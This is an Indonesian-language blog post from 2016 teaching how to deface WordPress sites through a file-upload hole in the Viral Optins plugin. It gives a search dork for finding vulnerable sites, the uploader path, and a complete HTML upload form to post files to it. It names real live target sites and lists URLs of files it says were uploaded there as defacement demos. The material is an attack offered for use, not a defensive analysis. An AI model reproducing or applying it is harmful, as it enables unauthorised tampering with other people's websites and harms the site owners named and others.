Header Ads

Home > Defacing > Deface Menggunakan Metode Viral_Optins v2

Deface Menggunakan Metode Viral_Optins v2

Tuesday, September 20, 2016




Kali ini gua akan share Deface Menggunakan Metode Viral_Optins v2 , langung saja ke tkp


Dork : "inurl:/wp-content/plugins/viral-optins/"
 Exploit : /wp-content/plugins/viral-optins/api/uploader/file-uploader.php

1. Live Target gua http://myplaypost.com



2. klik saja sitenya
3. lalu kita exploit , pake exploit yang di atas itu bro , nanti klo Vuln , sitenya akan Blank putih , contoh





4. kalo sudah kaya gitu kita masuk ke CSRF untuk upload script kita , ini gua bagi CSRF nya


    <font color="red"><center>
    <img style="width:400px;" src="http://i.imgur.com/WqFUd7q.jpg">
    <h1 align="center">CowoKerensTeam</h1></font>
    <br>
    <body background="black"><style>body {background:black}
    input,submit {border:1px;solid green;color:green}</style><center>
    <form method="POST" action="\Target/" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br>
   <center> <input type="submit" name="Submit" value="Hajar !">
    </form></body>
Simpan dengan ext .html + ganti TARGET yg warna merah itu , sama target mu , contoh
http://myplaypost.com/wp-content/plugins/viral-optins/api/uploader/file-uploader.php < masukan ke CSRF
jangan lupa juga buat di save klo udh masukin sitenya .

5. lalu kita masuk ke CSRF kita tadi , klik 2x . habis itu pilih BROWSE + upload script mu hanya bisa upload jenis .TXT saja  , klo sudah klik HAJAR !



6. klo berhasil nanti akan blank lagi tampilannya


7. mau tau letak hasil defacean kita ?

www.site.com//wp-content/uploads/tahun/bulan/index.txt < inget , isi sama tahun + bulan yang lu pas upload




Demo :

http://migmar.com/wp/wp-content/uploads/2016/09/index.txt
http://myplaypost.com/wp-content/uploads/2016/09/index.txt





Post a Comment

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.